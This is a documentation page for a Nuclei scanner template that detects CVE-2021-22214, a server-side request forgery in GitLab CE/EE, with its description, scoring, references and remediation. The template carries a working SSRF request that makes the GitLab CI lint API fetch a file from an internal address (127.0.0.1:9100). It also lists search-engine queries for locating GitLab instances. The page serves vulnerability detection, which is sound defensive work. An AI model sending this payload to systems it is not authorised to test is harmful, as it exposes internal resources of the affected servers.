Skip to content
Nuclei Templates

Gitlab CE/EE 10.5 - Server-Side Request Forgery

ID: CVE-2021-22214

Severity: high

Author: Suman_Kar,GitLab Red Team

Tags: cve2021,cve,gitlab,ssrf

Description

Section titled “Description”

GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:- CVE-2021-39935- CVE-2021-22214- CVE-2021-22175

YAML Source

Section titled “YAML Source”
id: CVE-2021-22214


info:
  name: Gitlab CE/EE 10.5 - Server-Side Request Forgery
  author: Suman_Kar,GitLab Red Team
  severity: high
  description: |
    GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:
    - CVE-2021-39935
    - CVE-2021-22214
    - CVE-2021-22175
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the system.
  remediation: |
    Upgrade Gitlab CE/EE to a version that is not affected by the vulnerability (10.6 or higher).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39935
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22175
    - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
    - https://docs.gitlab.com/ee/api/lint.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2021-22214
    cwe-id: CWE-918
    epss-score: 0.09317
    epss-percentile: 0.94683
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gitlab
    product: gitlab
    shodan-query:
      - http.title:"GitLab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2021,cve,gitlab,ssrf


http:
  - method: POST
    path:
      - "{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"


    body: |
      {"content": "include:\n  remote: http://127.0.0.1:9100/test.yml"}


    headers:
      Content-Type: application/json
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: word
        part: body
        words:
          - "does not have valid YAML syntax"
# digest: 4b0a0048304602210098ac39dfbb5c4121011de5ea6db351427bae89177d38f7d953ce6aad57088739022100b743a4f9e332ca4d70de5326e03531741fb94e4665dd71e8d942ad672765d32a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-22214.yaml"

View on Github